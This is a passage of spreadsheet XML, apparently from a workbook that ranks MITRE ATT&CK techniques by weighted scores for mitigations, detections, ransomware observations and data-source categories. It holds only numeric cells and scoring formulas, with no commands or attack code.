      <c r="Y268" s="37">
        <v>0</v>
      </c>
      <c r="Z268" s="37">
        <v>3</v>
      </c>
      <c r="AA268" s="37">
        <v>0.03</v>
      </c>
      <c r="AB268" s="37">
        <v>0.03</v>
      </c>
      <c r="AC268" s="37"/>
      <c r="AD268" s="50" t="s">
        <v>585</v>
      </c>
      <c r="AE268" s="37" t="str" cm="1">
        <f t="array" ref="AE268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD268)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF268" s="37">
        <v>264</v>
      </c>
      <c r="AG268" s="37" t="str" cm="1">
        <f t="array" ref="AG268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH268" s="37">
        <v>264</v>
      </c>
      <c r="AI268" s="37" t="str" cm="1">
        <f t="array" ref="AI268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD268)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ268" s="37">
        <v>264</v>
      </c>
      <c r="AK268" s="37" t="str" cm="1">
        <f t="array" ref="AK268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL268" s="37">
        <v>264</v>
      </c>
      <c r="AM268" s="37" t="str" cm="1">
        <f t="array" ref="AM268">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD268)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN268" s="37">
        <v>0</v>
      </c>
      <c r="AO268" s="37">
        <v>0</v>
      </c>
      <c r="AP268" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ268" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.266666666666673</v>
      </c>
      <c r="AR268" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS268" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT268" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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69" spans="1:47" ht="85">
      <c r="A269" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B269" s="37">
        <f t="shared" si="4"/>
        <v>1995.6903751428572</v>
      </c>
      <c r="C269" s="37" t="s">
        <v>948</v>
      </c>
      <c r="D269" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E269" s="37"/>
      <c r="F269" s="37">
        <v>1</v>
      </c>
      <c r="G269" s="37">
        <v>1</v>
      </c>
      <c r="H269" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I269" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J269" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K269" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L269" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M269" s="37">
        <v>1</v>
      </c>
      <c r="N269" s="56">
        <v>0</v>
      </c>
      <c r="O269" s="56">
        <v>94</v>
      </c>
      <c r="P269" s="56">
        <v>18</v>
      </c>
      <c r="Q269" s="56">
        <v>70</v>
      </c>
      <c r="R269" s="57" t="s">
        <v>950</v>
      </c>
      <c r="S269" s="57">
        <v>14</v>
      </c>
      <c r="T269" s="57" t="s">
        <v>951</v>
      </c>
      <c r="U269" s="57">
        <v>18</v>
      </c>
      <c r="V269" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.78095228571428565</v>
      </c>
      <c r="W269" s="37">
        <v>32</v>
      </c>
      <c r="X269" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y269" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z269" s="37">
        <v>182</v>
      </c>
      <c r="AA269" s="37">
        <v>1.82</v>
      </c>
      <c r="AB269" s="37">
        <v>1</v>
      </c>
      <c r="AC269" s="37"/>
      <c r="AD269" s="50" t="s">
        <v>952</v>
      </c>
      <c r="AE269" s="37" t="str" cm="1">
        <f t="array" ref="AE269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD269)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF269" s="37">
        <v>265</v>
      </c>
      <c r="AG269" s="37" t="str" cm="1">
        <f t="array" ref="AG269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD269)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH269" s="37">
        <v>265</v>
      </c>
      <c r="AI269" s="37" t="str" cm="1">
        <f t="array" ref="AI269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD269)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ269" s="37">
        <v>265</v>
      </c>
      <c r="AK269" s="37" t="str" cm="1">
        <f t="array" ref="AK269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD269)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL269" s="37">
        <v>265</v>
      </c>
      <c r="AM269" s="37" t="str" cm="1">
        <f t="array" ref="AM269">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD269)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN269" s="37">
        <v>0</v>
      </c>
      <c r="AO269" s="37">
        <v>2</v>
      </c>
      <c r="AP269" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ269" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>665.23012504761903</v>
      </c>
      <c r="AR269" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS269" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT269" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU26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31.725244049886619</v>
      </c>
    </row>
    <row r="270" spans="1:47" ht="34">
      <c r="A270" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B270" s="37">
        <f t="shared" si="4"/>
        <v>334.71413357142859</v>
      </c>
      <c r="C270" s="37" t="s">
        <v>953</v>
      </c>
      <c r="D270" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E270" s="37" t="s">
        <v>954</v>
      </c>
      <c r="F270" s="37">
        <v>1</v>
      </c>
      <c r="G270" s="37">
        <v>1</v>
      </c>
      <c r="H270" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I270" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J270" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K270" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L270" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M270" s="37">
        <v>0</v>
      </c>
      <c r="N270" s="56">
        <v>1</v>
      </c>
      <c r="O270" s="56">
        <v>5</v>
      </c>
      <c r="P270" s="56">
        <v>1</v>
      </c>
      <c r="Q270" s="56">
        <v>8</v>
      </c>
      <c r="R270" s="57" t="s">
        <v>955</v>
      </c>
      <c r="S270" s="57">
        <v>5</v>
      </c>
      <c r="T270" s="57" t="s">
        <v>956</v>
      </c>
      <c r="U270" s="57">
        <v>10</v>
      </c>
      <c r="V270" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428557142857144</v>
      </c>
      <c r="W270" s="37">
        <v>15</v>
      </c>
      <c r="X270" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y270" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z270" s="37">
        <v>15</v>
      </c>
      <c r="AA270" s="37">
        <v>0.15</v>
      </c>
      <c r="AB270" s="37">
        <v>0.15</v>
      </c>
      <c r="AC270" s="37"/>
      <c r="AD270" s="50" t="s">
        <v>957</v>
      </c>
      <c r="AE270" s="37" t="str" cm="1">
        <f t="array" ref="AE270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD270)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF270" s="37">
        <v>266</v>
      </c>
      <c r="AG270" s="37" t="str" cm="1">
        <f t="array" ref="AG270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH270" s="37">
        <v>266</v>
      </c>
      <c r="AI270" s="37" t="str" cm="1">
        <f t="array" ref="AI270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD270)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ270" s="37">
        <v>266</v>
      </c>
      <c r="AK270" s="37" t="str" cm="1">
        <f t="array" ref="AK270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL270" s="37">
        <v>266</v>
      </c>
      <c r="AM270" s="37" t="str" cm="1">
        <f t="array" ref="AM270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN270" s="37">
        <v>0</v>
      </c>
      <c r="AO270" s="37">
        <v>0</v>
      </c>
      <c r="AP270" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ270" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>111.57137785714286</v>
      </c>
      <c r="AR270" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS270" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT270" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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71" spans="1:47" ht="68">
      <c r="A271" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B271" s="37">
        <f t="shared" si="4"/>
        <v>295.24766995238093</v>
      </c>
      <c r="C271" s="37" t="s">
        <v>958</v>
      </c>
      <c r="D271" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E271" s="37" t="s">
        <v>959</v>
      </c>
      <c r="F271" s="37">
        <v>1</v>
      </c>
      <c r="G271" s="37">
        <v>1</v>
      </c>
      <c r="H271" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I271" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J271" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K271" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L271" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M271" s="37">
        <v>0</v>
      </c>
      <c r="N271" s="56">
        <v>0</v>
      </c>
      <c r="O271" s="56">
        <v>1</v>
      </c>
      <c r="P271" s="56">
        <v>1</v>
      </c>
      <c r="Q271" s="56">
        <v>1</v>
      </c>
      <c r="R271" s="57" t="s">
        <v>960</v>
      </c>
      <c r="S271" s="57">
        <v>6</v>
      </c>
      <c r="T271" s="57" t="s">
        <v>961</v>
      </c>
      <c r="U271" s="57">
        <v>11</v>
      </c>
      <c r="V271" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17619052380952382</v>
      </c>
      <c r="W271" s="37">
        <v>17</v>
      </c>
      <c r="X271" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y271" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z271" s="37">
        <v>3</v>
      </c>
      <c r="AA271" s="37">
        <v>0.03</v>
      </c>
      <c r="AB271" s="37">
        <v>0.03</v>
      </c>
      <c r="AC271" s="37"/>
      <c r="AD271" s="50" t="s">
        <v>962</v>
      </c>
      <c r="AE271" s="37" t="str" cm="1">
        <f t="array" ref="AE271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD271)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF271" s="37">
        <v>267</v>
      </c>
      <c r="AG271" s="37" t="str" cm="1">
        <f t="array" ref="AG271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH271" s="37">
        <v>267</v>
      </c>
      <c r="AI271" s="37" t="str" cm="1">
        <f t="array" ref="AI271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD271)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ271" s="37">
        <v>267</v>
      </c>
      <c r="AK271" s="37" t="str" cm="1">
        <f t="array" ref="AK271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL271" s="37">
        <v>267</v>
      </c>
      <c r="AM271" s="37" t="str" cm="1">
        <f t="array" ref="AM271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN271" s="37">
        <v>0</v>
      </c>
      <c r="AO271" s="37">
        <v>0</v>
      </c>
      <c r="AP271" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ271" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>98.415889984126977</v>
      </c>
      <c r="AR271" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS271" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT271" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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72" spans="1:47" ht="51">
      <c r="A272" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B272" s="37">
        <f t="shared" si="4"/>
        <v>347.44777233333332</v>
      </c>
      <c r="C272" s="37" t="s">
        <v>963</v>
      </c>
      <c r="D272" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E272" s="37" t="s">
        <v>964</v>
      </c>
      <c r="F272" s="37">
        <v>1</v>
      </c>
      <c r="G272" s="37">
        <v>1</v>
      </c>
      <c r="H272" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I272" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J272" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K272" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L272" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M272" s="37">
        <v>0</v>
      </c>
      <c r="N272" s="56">
        <v>1</v>
      </c>
      <c r="O272" s="56">
        <v>7</v>
      </c>
      <c r="P272" s="56">
        <v>0</v>
      </c>
      <c r="Q272" s="56">
        <v>3</v>
      </c>
      <c r="R272" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S272" s="57">
        <v>7</v>
      </c>
      <c r="T272" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U272" s="57">
        <v>11</v>
      </c>
      <c r="V272" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22380966666666668</v>
      </c>
      <c r="W272" s="37">
        <v>18</v>
      </c>
      <c r="X272" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y272" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z272" s="37">
        <v>11</v>
      </c>
      <c r="AA272" s="37">
        <v>0.11</v>
      </c>
      <c r="AB272" s="37">
        <v>0.11</v>
      </c>
      <c r="AC272" s="37"/>
      <c r="AD272" s="50" t="s">
        <v>316</v>
      </c>
      <c r="AE272" s="37" t="str" cm="1">
        <f t="array" ref="AE272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD272)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF272" s="37">
        <v>268</v>
      </c>
      <c r="AG272" s="37" t="str" cm="1">
        <f t="array" ref="AG272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD272)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH272" s="37">
        <v>268</v>
      </c>
      <c r="AI272" s="37" t="str" cm="1">
        <f t="array" ref="AI272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ272" s="37">
        <v>268</v>
      </c>
      <c r="AK272" s="37" t="str" cm="1">
        <f t="array" ref="AK272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL272" s="37">
        <v>268</v>
      </c>
      <c r="AM272" s="37" t="str" cm="1">
        <f t="array" ref="AM272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN272" s="37">
        <v>0</v>
      </c>
      <c r="AO272" s="37">
        <v>0</v>
      </c>
      <c r="AP272" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ272" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>115.8159241111111</v>
      </c>
      <c r="AR272" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS272" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT272" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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73" spans="1:47" ht="34">
      <c r="A273" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B273" s="37">
        <f t="shared" si="4"/>
        <v>343.61443957142859</v>
      </c>
      <c r="C273" s="37" t="s">
        <v>966</v>
      </c>
      <c r="D273" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E273" s="37" t="s">
        <v>967</v>
      </c>
      <c r="F273" s="37">
        <v>1</v>
      </c>
      <c r="G273" s="37">
        <v>1</v>
      </c>
      <c r="H273" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I273" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J273" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K273" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L273" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M273" s="37">
        <v>0</v>
      </c>
      <c r="N273" s="56">
        <v>0</v>
      </c>
      <c r="O273" s="56">
        <v>0</v>
      </c>
      <c r="P273" s="56">
        <v>1</v>
      </c>
      <c r="Q273" s="56">
        <v>9</v>
      </c>
      <c r="R273" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S273" s="57">
        <v>7</v>
      </c>
      <c r="T273" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U273" s="57">
        <v>11</v>
      </c>
      <c r="V273" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904776190476191</v>
      </c>
      <c r="W273" s="37">
        <v>18</v>
      </c>
      <c r="X273" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y273" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z273" s="37">
        <v>10</v>
      </c>
      <c r="AA273" s="37">
        <v>0.1</v>
      </c>
      <c r="AB273" s="37">
        <v>0.1</v>
      </c>
      <c r="AC273" s="37"/>
      <c r="AD273" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE273" s="37" t="str" cm="1">
        <f t="array" ref="AE273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD273)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF273" s="37">
        <v>269</v>
      </c>
      <c r="AG273" s="37" t="str" cm="1">
        <f t="array" ref="AG273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH273" s="37">
        <v>269</v>
      </c>
      <c r="AI273" s="37" t="str" cm="1">
        <f t="array" ref="AI273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ273" s="37">
        <v>269</v>
      </c>
      <c r="AK273" s="37" t="str" cm="1">
